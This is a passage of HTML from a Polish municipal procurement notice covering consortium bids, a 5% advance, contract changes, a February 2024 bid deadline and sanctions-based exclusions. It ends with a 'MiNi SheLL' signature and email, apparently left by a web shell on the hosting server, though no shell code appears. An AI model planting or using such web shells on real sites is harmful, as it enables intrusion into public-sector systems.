class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>Uwaga: Spółka cywilna jest kwalifikowana jako wykonawcy wspólnie ubiegający się o udzielenie zamówienia.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o którym mowa w art. 125 ust. 1<br/>PZP składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia spełnienie warunku wiedzy i<br/>doświadczenia musi wykazać jeden z wykonawców składających ofertę wspólną (np. jeden z członków konsorcjum).<br/>4. W odniesieniu do warunków dotyczących doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych wykonawców, którzy wykonają roboty budowlane do których realizacji te zdolności są<br/>wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, o którym mowa w art. 117 ust 4 PZP, z którego wynika, które roboty budowlane wykonają poszczególni<br/>wykonawcy składający ofertę wspólnie (wzór oświadczenia stanowi załącznik 6 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający przewiduje udzielenie zaliczki w wysokości 5 % wynagrodzenia brutto (danej umowy). Płatność nastąpi<br/>zgodnie z warunkami wypłat dofinansowania z Programu Rządowy Fundusz Polski Ład oraz regulaminem Programu, a<br/>szczegółowe informacje zawarte są we wzorach umowy stanowiących odpowiednio i w zależności od danej części – zadania<br/>załączniki o nr 2a ,2b,2c do SWZ. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego zostały zawarte w załączonym do SWZ wzorze<br/>umowy odrębnym dla każdej części – z tego względu, że Zamawiający wymaga od Wykonawcy, aby zawarł z nim<br/>umowę w sprawie zamówienia publicznego na takich warunkach, jak zawarte w załączonym do SWZ wzorze umowy stanowiącym odpowiednio i w zależności od danej części załączniki: 2a ÷ 2c do SWZ. Zgodnie z art. 455 ust. 1 pkt 1 ustawy<br/>Zamawiający przewiduje możliwość zmiany umowy w trakcie jej trwania niezależnie od wartości tej zmiany, w przypadku<br/>wystąpienia, co najmniej jednej z wymienionych okoliczności oraz określa warunki zmian zgodnie z zapisami zawartymi we<br/>wzorach umowy odrębnych dla danej części - załączniki: nr 2a - 2c do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/ug_chelmza/proceedings w myśl PZP na stronie internetowej prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-23 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5% ceny całkowitej brutto w<br/>każdej z części (dla każdego z dwóch zadań osobno).<br/>Na podstawie art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego), z postępowania o udzielenie<br/>zamówienia publicznego wyklucza się wykonawców, o których mowa w art. 7 ust. 1 w/w ustawy. Powyższe wykluczenie<br/>następować będzie na okres trwania ww. okoliczności. W przypadku wykonawcy wykluczonego na podstawie art. 7 ust. 1<br/>ustawy, zamawiający odrzuca ofertę takiego wykonawcy, odpowiednio do trybu stosowanego do udzielenia zamówienia<br/>publicznego oraz etapu prowadzonego postępowania o udzielenie zamówienia publicznego.<br/>Inne wymagane dokumenty:<br/>1. Zobowiązanie podmiotu udostępniającego zasoby – jeżeli dotyczy. Zobowiązanie podmiotu udostępniającego wykonawcy<br/>zasoby na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>2. Oświadczenie podmiotu udostępniającego zasoby – jeżeli dotyczy. Oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w<br/>zakresie w jakim wykonawca powołuje się na jego zasoby.<br/>3. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w art. 117 ust. 4 – jeżeli<br/>dotyczy.<br/>4. Pełnomocnictwo, jeżeli umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych. Wykonawca, który<br/>składa ofertę za pośrednictwem pełnomocnika powinien dołączyć do oferty dokument pełnomocnictwa, obejmujący swoim<br/>zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. W przypadku wykonawców<br/>ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument<br/>pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu wykonawców<br/>ubiegających się wspólnie o udzielenie zamówienia należy załączyć do oferty.<br/>Zamówienie objęte zostanie dofinansowaniem z Programu Rządowy Fundusz Polski Ład: Program Inwestycji<br/>Strategicznych.

Creat By MiNi SheLL
Email: jattceo@gmail.com